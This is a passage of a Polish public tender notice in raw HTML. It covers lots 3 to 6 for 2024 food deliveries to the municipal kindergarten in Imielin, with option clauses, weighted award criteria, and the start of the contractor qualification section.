to, że zastrzega możliwość zamówienia mniejszej tj. do 30% ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (formularz ofertowy) lub zwiększenia ilości zamawianych na bieżąco produktów do 50 % więcej niż ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (Formularz ofertowy). <br/>2) Uruchomienie prawa opcji w stanie faktycznym nastąpi od podpisania umowy. Zamawiający na etapie przeprowadzania postępowania o udzielenie zamówienia publicznego nie jest w stanie przedstawić dokładniejszego zakresu zmian ilościowych dla zamawianych poszczególnych produktów. Zamawiający w okresie trwania umowy będzie zamawiał poszczególne produkty na bieżąco w ilościach zależnych od swoich potrzeb. <br/>4) Prawo opcji jest uprawnieniem Zamawiającego, a Wykonawcy z tytułu zastosowania przez Zamawiającego prawa opcji nie będą przysługiwały żadne roszczenia. <br/>5) Cena jednostkowa zamawianych poszczególnych artykułów, zawsze, niezależnie od zastosowanej opcji będzie identyczna jak w Formularzu ofertowym, i która zostanie wyliczona w oparciu o ilości szacunkowe (orientacyjne) podane przez Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje w 2024 roku przeprowadzenie postępowania o udzielenie zamówienia publicznego na dostawę tego<br/>samego rodzaju na rok 2025r. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą<br/>liczbę punktów, wynikających z przyjętych kryteriów oceny ofert tj. sumy punktów czterech kryteriów:<br/>Cena (C)<br/>Czas dostawy dodatkowej (awaryjnej )<br/>możliwość uzupełniająca dostawę w ciągu 2 godzin<br/>dostawy między6:00 - 9:00</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy dodatkowej awaryjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">mozliwość uzupełniająca dostawę w ciągu dwóch godzin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dostawa pomiędzy godzina 6 a 9</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie obejmuje sukcesywną dostawę artykułów spożywczych do Przedszkola Miejskiego w Imielinie w celu<br/>przygotowania posiłków dla dzieci w okresie od 02.01.2024 r. do 31.12.2024r z wyłączeniem miesiąca lipca.<br/>2. Szczegółowy wykaz przewidzianych do zamówienia produktów oraz przewidziane ilości<br/>szacunkowe (orientacyjne) tych produktów planowanych do zamówienia w okresie jedenastu<br/>miesięcy został zawarty w załączniku nr 1 do SWZ – Formularzu ofertowym. Podkreśla się<br/>iż podane w Formularzu ofertowym ilości są ilościami szacunkowymi tj<br/>orientacyjnymi, podanymi na potrzeby dokonania oceny ofert i wyboru oferty<br/>najkorzystniejszej oraz określenia wartości umowy. Zamawiający zastrzega, że w ramach<br/>zawartej umowy będzie dokonywał zakupów w ramach danej grupy produktów, wg cen<br/>jednostkowych oferowanych przez Wykonawcę. Ilość zamawianych produktów będzie<br/>uzależniona od potrzeb Zamawiającego. Faktyczne całkowite wynagrodzenie Wykonawcy w<br/>związku z realizacją umowy będzie uzależnione od faktycznej ilości dostarczonych w całym<br/>okresie obowiązywania umowy produktów Art. głęboko mrożone </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15896000-5 - Produkty głęboko mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający w związku z zapisami punktu 2, zgodnie z zapisem art. 441 ust. 1 ustawy PZP przewiduje zastosowanie prawa opcji do niniejszego zamówienia. Zamawiający przewiduje dwie możliwe opcje. Suma ilości zamawianych poszczególnych produktów może być mniejsza lub większa niż wskazał jako ilości szacunkowe (orientacyjne)w formularzu ofertowym – załącznik nr 1 do SWZ. Oznacza to, że zastrzega możliwość zamówienia mniejszej tj. do 30% ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (formularz ofertowy) lub zwiększenia ilości zamawianych na bieżąco produktów do 50 % więcej niż ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (Formularz ofertowy). <br/>2) Uruchomienie prawa opcji w stanie faktycznym nastąpi od podpisania umowy. Zamawiający na etapie przeprowadzania postępowania o udzielenie zamówienia publicznego nie jest w stanie przedstawić dokładniejszego zakresu zmian ilościowych dla zamawianych poszczególnych produktów. Zamawiający w okresie trwania umowy będzie zamawiał poszczególne produkty na bieżąco w ilościach zależnych od swoich potrzeb. <br/>4) Prawo opcji jest uprawnieniem Zamawiającego, a Wykonawcy z tytułu zastosowania przez Zamawiającego prawa opcji nie będą przysługiwały żadne roszczenia. <br/>5) Cena jednostkowa zamawianych poszczególnych artykułów, zawsze, niezależnie od zastosowanej opcji będzie identyczna jak w Formularzu ofertowym, i która zostanie wyliczona w oparciu o ilości szacunkowe (orientacyjne) podane przez Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje w 2024 roku przeprowadzenie postępowania o udzielenie zamówienia publicznego na dostawę tego<br/>samego rodzaju na rok 2025r. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą<br/>liczbę punktów, wynikających z przyjętych kryteriów oceny ofert tj. sumy punktów czterech kryteriów:<br/>Cena (C)<br/>Czas dostawy dodatkowej (awaryjnej )<br/>możliwość uzupełniająca dostawę w ciągu 2 godzin<br/>dostawy między6:00 - 9:00</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy dodatkowej awaryjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">mozliwość uzupełniająca dostawę w ciągu dwóch godzin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dostawa pomiędzy godzina 6 a 9</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie obejmuje sukcesywną dostawę artykułów spożywczych do Przedszkola Miejskiego w Imielinie w celu<br/>przygotowania posiłków dla dzieci w okresie od 02.01.2024 r. do 31.12.2024r z wyłączeniem miesiąca lipca.<br/>2. Szczegółowy wykaz przewidzianych do zamówienia produktów oraz przewidziane ilości<br/>szacunkowe (orientacyjne) tych produktów planowanych do zamówienia w okresie jedenastu<br/>miesięcy został zawarty w załączniku nr 1 do SWZ – Formularzu ofertowym. Podkreśla się<br/>iż podane w Formularzu ofertowym ilości są ilościami szacunkowymi tj<br/>orientacyjnymi, podanymi na potrzeby dokonania oceny ofert i wyboru oferty<br/>najkorzystniejszej oraz określenia wartości umowy. Zamawiający zastrzega, że w ramach<br/>zawartej umowy będzie dokonywał zakupów w ramach danej grupy produktów, wg cen<br/>jednostkowych oferowanych przez Wykonawcę. Ilość zamawianych produktów będzie<br/>uzależniona od potrzeb Zamawiającego. Faktyczne całkowite wynagrodzenie Wykonawcy w<br/>związku z realizacją umowy będzie uzależnione od faktycznej ilości dostarczonych w całym<br/>okresie obowiązywania umowy produktów Art. ogólnospożywcze </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający w związku z zapisami punktu 2, zgodnie z zapisem art. 441 ust. 1 ustawy PZP przewiduje zastosowanie prawa opcji do niniejszego zamówienia. Zamawiający przewiduje dwie możliwe opcje. Suma ilości zamawianych poszczególnych produktów może być mniejsza lub większa niż wskazał jako ilości szacunkowe (orientacyjne)w formularzu ofertowym – załącznik nr 1 do SWZ. Oznacza to, że zastrzega możliwość zamówienia mniejszej tj. do 30% ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (formularz ofertowy) lub zwiększenia ilości zamawianych na bieżąco produktów do 50 % więcej niż ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (Formularz ofertowy). <br/>2) Uruchomienie prawa opcji w stanie faktycznym nastąpi od podpisania umowy. Zamawiający na etapie przeprowadzania postępowania o udzielenie zamówienia publicznego nie jest w stanie przedstawić dokładniejszego zakresu zmian ilościowych dla zamawianych poszczególnych produktów. Zamawiający w okresie trwania umowy będzie zamawiał poszczególne produkty na bieżąco w ilościach zależnych od swoich potrzeb. <br/>4) Prawo opcji jest uprawnieniem Zamawiającego, a Wykonawcy z tytułu zastosowania przez Zamawiającego prawa opcji nie będą przysługiwały żadne roszczenia. <br/>5) Cena jednostkowa zamawianych poszczególnych artykułów, zawsze, niezależnie od zastosowanej opcji będzie identyczna jak w Formularzu ofertowym, i która zostanie wyliczona w oparciu o ilości szacunkowe (orientacyjne) podane przez Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje w 2024 roku przeprowadzenie postępowania o udzielenie zamówienia publicznego na dostawę tego zamówienia w roku 2025 <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą<br/>liczbę punktów, wynikających z przyjętych kryteriów oceny ofert tj. sumy punktów czterech kryteriów:<br/>Cena (C)<br/>Czas dostawy dodatkowej (awaryjnej )<br/>możliwość uzupełniająca dostawę w ciągu 2 godzin<br/>dostawy między6:00 - 9:00</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy dodatkowej awaryjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">mozliwość uzupełniająca dostawę w ciągu dwóch godzin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dostawa pomiędzy godzina 6 a 9</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie obejmuje sukcesywną dostawę artykułów spożywczych do Przedszkola Miejskiego w Imielinie w celu<br/>przygotowania posiłków dla dzieci w okresie od 02.01.2024 r. do 31.12.2024r z wyłączeniem miesiąca lipca.<br/>2. Szczegółowy wykaz przewidzianych do zamówienia produktów oraz przewidziane ilości<br/>szacunkowe (orientacyjne) tych produktów planowanych do zamówienia w okresie jedenastu<br/>miesięcy został zawarty w załączniku nr 1 do SWZ – Formularzu ofertowym. Podkreśla się<br/>iż podane w Formularzu ofertowym ilości są ilościami szacunkowymi tj<br/>orientacyjnymi, podanymi na potrzeby dokonania oceny ofert i wyboru oferty<br/>najkorzystniejszej oraz określenia wartości umowy. Zamawiający zastrzega, że w ramach<br/>zawartej umowy będzie dokonywał zakupów w ramach danej grupy produktów, wg cen<br/>jednostkowych oferowanych przez Wykonawcę. Ilość zamawianych produktów będzie<br/>uzależniona od potrzeb Zamawiającego. Faktyczne całkowite wynagrodzenie Wykonawcy w<br/>związku z realizacją umowy będzie uzależnione od faktycznej ilości dostarczonych w całym<br/>okresie obowiązywania umowy produktów Art. warzywa owoce </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03220000-9 - Warzywa, owoce i orzechy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający w związku z zapisami punktu 2, zgodnie z zapisem art. 441 ust. 1 ustawy PZP przewiduje zastosowanie prawa opcji do niniejszego zamówienia. Zamawiający przewiduje dwie możliwe opcje. Suma ilości zamawianych poszczególnych produktów może być mniejsza lub większa niż wskazał jako ilości szacunkowe (orientacyjne)w formularzu ofertowym – załącznik nr 1 do SWZ. Oznacza to, że zastrzega możliwość zamówienia mniejszej tj. do 30% ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (formularz ofertowy) lub zwiększenia ilości zamawianych na bieżąco produktów do 50 % więcej niż ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (Formularz ofertowy). <br/>2) Uruchomienie prawa opcji w stanie faktycznym nastąpi od podpisania umowy. Zamawiający na etapie przeprowadzania postępowania o udzielenie zamówienia publicznego nie jest w stanie przedstawić dokładniejszego zakresu zmian ilościowych dla zamawianych poszczególnych produktów. Zamawiający w okresie trwania umowy będzie zamawiał poszczególne produkty na bieżąco w ilościach zależnych od swoich potrzeb. <br/>4) Prawo opcji jest uprawnieniem Zamawiającego, a Wykonawcy z tytułu zastosowania przez Zamawiającego prawa opcji nie będą przysługiwały żadne roszczenia. <br/>5) Cena jednostkowa zamawianych poszczególnych artykułów, zawsze, niezależnie od zastosowanej opcji będzie identyczna jak w Formularzu ofertowym, i która zostanie wyliczona w oparciu o ilości szacunkowe (orientacyjne) podane przez Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje w 2024 roku przeprowadzenie postępowania o udzielenie zamówienia publicznego na dostawę tego zamówienia w roku 2025 <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą<br/>liczbę punktów, wynikających z przyjętych kryteriów oceny ofert tj. sumy punktów czterech kryteriów:<br/>Cena (C)<br/>Czas dostawy dodatkowej (awaryjnej )<br/>możliwość uzupełniająca dostawę w ciągu 2 godzin<br/>dostawy między6:00 - 9:00</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy dodatkowej awaryjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">mozliwość uzupełniająca dostawę w ciągu dwóch godzin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dostawa pomiędzy godzina 6 a 9</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie obejmuje sukcesywną dostawę artykułów spożywczych do Przedszkola Miejskiego w Imielinie w celu<br/>przygotowania posiłków dla dzieci w okresie od 02.01.2024 r. do 31.12.2024r z wyłączeniem miesiąca lipca.<br/>2. Szczegółowy wykaz przewidzianych do zamówienia produktów oraz przewidziane ilości<br/>szacunkowe (orientacyjne) tych produktów planowanych do zamówienia w okresie jedenastu<br/>miesięcy został zawarty w załączniku nr 1 do SWZ – Formularzu ofertowym. Podkreśla się<br/>iż podane w Formularzu ofertowym ilości są ilościami szacunkowymi tj<br/>orientacyjnymi, podanymi na potrzeby dokonania oceny ofert i wyboru oferty<br/>najkorzystniejszej oraz określenia wartości umowy. Zamawiający zastrzega, że w ramach<br/>zawartej umowy będzie dokonywał zakupów w ramach danej grupy produktów, wg cen<br/>jednostkowych oferowanych przez Wykonawcę. Ilość zamawianych produktów będzie<br/>uzależniona od potrzeb Zamawiającego. Faktyczne całkowite wynagrodzenie Wykonawcy w<br/>związku z realizacją umowy będzie uzależnione od faktycznej ilości dostarczonych w całym<br/>okresie obowiązywania umowy produktów Art. pieczywo </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający w związku z zapisami punktu 2, zgodnie z zapisem art. 441 ust. 1 ustawy PZP przewiduje zastosowanie prawa opcji do niniejszego zamówienia. Zamawiający przewiduje dwie możliwe opcje. Suma ilości zamawianych poszczególnych produktów może być mniejsza lub większa niż wskazał jako ilości szacunkowe (orientacyjne)w formularzu ofertowym – załącznik nr 1 do SWZ. Oznacza to, że zastrzega możliwość zamówienia mniejszej tj. do 30% ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (formularz ofertowy) lub zwiększenia ilości zamawianych na bieżąco produktów do 50 % więcej niż ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (Formularz ofertowy). <br/>2) Uruchomienie prawa opcji w stanie faktycznym nastąpi od podpisania umowy. Zamawiający na etapie przeprowadzania postępowania o udzielenie zamówienia publicznego nie jest w stanie przedstawić dokładniejszego zakresu zmian ilościowych dla zamawianych poszczególnych produktów. Zamawiający w okresie trwania umowy będzie zamawiał poszczególne produkty na bieżąco w ilościach zależnych od swoich potrzeb. <br/>4) Prawo opcji jest uprawnieniem Zamawiającego, a Wykonawcy z tytułu zastosowania przez Zamawiającego prawa opcji nie będą przysługiwały żadne roszczenia. <br/>5) Cena jednostkowa zamawianych poszczególnych artykułów, zawsze, niezależnie od zastosowanej opcji będzie identyczna jak w Formularzu ofertowym, i która zostanie wyliczona w oparciu o ilości szacunkowe (orientacyjne) podane przez Zamawiającego. art pieczywo wyroby ciastkarskie i piekarskie <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje w 2024 roku przeprowadzenie postępowania o udzielenie zamówienia publicznego na dostawę tego zamówienia w roku 2024 <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą<br/>liczbę punktów, wynikających z przyjętych kryteriów oceny ofert tj. sumy punktów czterech kryteriów:<br/>Cena (C)<br/>Czas dostawy dodatkowej (awaryjnej )<br/>możliwość uzupełniająca dostawę w ciągu 2 godzin<br/>dostawy między6:00 - 9:00</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy dodatkowej awaryjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">mozliwość uzupełniająca dostawę w ciągu dwóch godzin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dostawa pomiędzy godzina 6 a 9</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki w zakresie: <br/>1)	Zdolności do występowania w obrocie gospodarczym. Ocena spełnienia warunku nastąpi poprzez weryfikację wstępnego oświadczenia wykonawcy, o którym mowa w art. 125 ust. 1 ustawy PZP. <br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub 